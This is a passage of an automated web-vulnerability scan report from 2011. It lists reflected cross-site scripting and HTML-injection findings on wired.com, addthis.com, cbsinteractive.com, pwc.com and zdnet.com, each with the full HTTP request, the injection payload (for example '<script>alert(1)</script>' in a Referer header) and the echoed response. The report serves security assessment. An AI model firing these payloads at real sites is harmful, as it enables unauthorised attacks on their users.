Content-Type: text/html; charset=UTF-8
Content-Length: 28617
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:12:23 GMT
Date: Wed, 12 Jan 2011 05:08:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user6e6e4"><a>5dd758f037d ss_login">
...[SNIP]...

3.64. http://www.wired.com/user/login [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/login

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c812"><a>5f7d13f6048 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/login1c812"><a>5f7d13f6048 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28617
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:13:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:13:01 GMT
Connection: close
Set-Cookie: JSESSIONID=cabM-CK_HDwqVgt0cP41s; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user ss_login1c812"><a>5f7d13f6048">
...[SNIP]...

3.65. http://www.wired.com/user/logout [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/logout

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7759e"><a>e2aad4de1c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user7759e"><a>e2aad4de1c1/logout HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28619
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:12:28 GMT
Date: Wed, 12 Jan 2011 05:08:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user7759e"><a>e2aad4de1c1 ss_logout">
...[SNIP]...

3.66. http://www.wired.com/user/logout [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/logout

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e31"><a>04439d0209d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/logout68e31"><a>04439d0209d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28619
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:12:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:12:54 GMT
Connection: close
Set-Cookie: JSESSIONID=abcwtLdaCQT637ylbP41s; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user ss_logout68e31"><a>04439d0209d">
...[SNIP]...

3.67. http://www.wired.com/user/registration [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/registration

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6859"><a>f18010a37e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /usere6859"><a>f18010a37e9/registration HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28631
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:13:12 GMT
Date: Wed, 12 Jan 2011 05:09:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_usere6859"><a>f18010a37e9 ss_registration">
...[SNIP]...

3.68. http://www.wired.com/user/registration [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/registration

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eb8b"><a>e52b868ec54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/registration6eb8b"><a>e52b868ec54 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28631
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:13:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:13:15 GMT
Connection: close
Set-Cookie: JSESSIONID=acbOZw9Mr3a9Y7nkgP41s; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user ss_registration6eb8b"><a>e52b868ec54">
...[SNIP]...

3.69. http://www.wired.com/video/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d31f0"><a>5e756706c49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videod31f0"><a>5e756706c49/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28605
Vary: Accept-Encoding
Cache-Control: max-age=292
Expires: Wed, 12 Jan 2011 05:12:52 GMT
Date: Wed, 12 Jan 2011 05:08:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videod31f0"><a>5e756706c49">
...[SNIP]...

3.70. http://www.wired.com/video/search/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/search/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d05"><a>3d4bdf06559 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videoc2d05"><a>3d4bdf06559/search/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28622
Vary: Accept-Encoding
Cache-Control: max-age=280
Expires: Wed, 12 Jan 2011 05:12:40 GMT
Date: Wed, 12 Jan 2011 05:08:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videoc2d05"><a>3d4bdf06559 ss_search">
...[SNIP]...

3.71. http://www.wired.com/video/search/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/search/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32a6e"><a>13c7c111330 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/search32a6e"><a>13c7c111330/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=276
Expires: Wed, 12 Jan 2011 05:16:48 GMT
Date: Wed, 12 Jan 2011 05:12:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_search32a6e"><a>13c7c111330">
...[SNIP]...

3.72. http://www.wired.com/video/search/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/search/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b2e3"-alert(1)-"1d49aac262e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/search3b2e3"-alert(1)-"1d49aac262e/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=300
Expires: Wed, 12 Jan 2011 05:18:11 GMT
Date: Wed, 12 Jan 2011 05:13:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107866


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<!--

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "search3b2e3"-alert(1)-"1d49aac262e","video"], charmap : {' ' : '+', '-' : '_'}});
//-->
...[SNIP]...

3.73. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 58b68<script>alert(1)</script>3763bb90dac was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=58b68<script>alert(1)</script>3763bb90dac

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:18:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<h4>58b68<script>alert(1)</script>3763bb90dac - Google search</h4>
...[SNIP]...

3.74. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8dc2"><script>alert(1)</script>e3ab32dcff8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a8dc2"><script>alert(1)</script>e3ab32dcff8

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:18:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=a8dc2"><script>alert(1)</script>e3ab32dcff8" />
...[SNIP]...

3.75. http://www.cbsinteractive.com/adfeedback/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cbsinteractive.com
Path:   /adfeedback/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a4ae"><script>alert(1)</script>852aef82148 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /adfeedback/ HTTP/1.1
Host: www.cbsinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4a4ae"><script>alert(1)</script>852aef82148

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:26:14 GMT
Server: Apache/2.2
Keep-Alive: timeout=15, max=868
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 21660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
   <head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

...[SNIP]...
<input type="hidden" name="refurl" value="http://www.google.com/search?hl=en&q=4a4ae"><script>alert(1)</script>852aef82148" />
...[SNIP]...

3.76. http://www.pwc.com/en_GX/webadmin/forms/contactUs.jhtml [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pwc.com
Path:   /en_GX/webadmin/forms/contactUs.jhtml

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3a98"><script>alert(1)</script>ff110ca5099 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /en_GX/webadmin/forms/contactUs.jhtml HTTP/1.1
Host: www.pwc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PWC_WOD=id=173.193.214.243-2605364368.30126492:lv=1294760111214:ss=1294760084820; __utmz=257467274.1294756485.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=price%20waterhouse; __utma=257467274.728746398.1294756485.1294756485.1294756485.1; __utmc=257467274; __utmb=257467274.1.10.1294756485; LD.previous.visitor.us.pwc.com=true;
Referer: http://www.google.com/search?hl=en&q=b3a98"><script>alert(1)</script>ff110ca5099

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
P3P: policyref="http://www.pwc.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMi PUBi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA"
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Date: Tue, 11 Jan 2011 14:35:30 GMT
Content-Length: 28240
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gx" lang="en-gx">
<h
...[SNIP]...
<input type="hidden" name="SourceLink" value="http://www.google.com/search?hl=en&q=b3a98"><script>alert(1)</script>ff110ca5099" />
...[SNIP]...

3.77. http://www.zdnet.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zdnet.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaf41"-alert(1)-"1c24072dd63 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: aaf41"-alert(1)-"1c24072dd63

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 05:13:21 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22623%22%2C%22longittude%22%3A%22-96.799%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22dallas%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2277%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2232.787%22%7D; expires=Thu, 12-Jan-2012 05:13:21 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=982
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 120774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
log.com.com/adlog/c/r=16468&amp;sg=484398&amp;o=10%253A&amp;h=cn&amp;p=&amp;b=2&amp;l=&amp;site=2&amp;pt=2000&amp;nd=10&amp;pid=&amp;cid=0&amp;pp=100&amp;e=&amp;rqid=00c13-ad-e5:4D2D117229E326&amp;orh=aaf41"-alert(1)-"1c24072dd63&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=aaf41"-alert(1)-"1c24072dd63&amp;cpnmodule=&amp;count=&amp;ra=173.193.214.243&amp;pg=QoA04goPOUsAABpwKpwAAAA6&amp;t=2011.01.12.05.13.21/http://ad.do
...[SNIP]...

3.78. http://www.zdnet.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b55d0"><a>dadba004ac was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: b55d0"><a>dadba004ac

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 05:09:29 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22623%22%2C%22longittude%22%3A%22-96.799%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22dallas%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2277%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2232.787%22%7D; expires=Thu, 12-Jan-2012 05:09:29 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=999
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 119848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
/adlog.com.com/adlog/i/r=6455&amp;sg=1815&amp;o=10%253A&amp;h=cn&amp;p=&amp;b=2&amp;l=&amp;site=2&amp;pt=2000&amp;nd=10&amp;pid=&amp;cid=0&amp;pp=100&amp;e=&amp;rqid=01c13-ad-e7:4D2CE7575A872D&amp;orh=b55d0"><a>dadba004ac&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=b55d0">
...[SNIP]...

3.79. http://www.zdnet.com/ [Referer HTTP header]

Summary

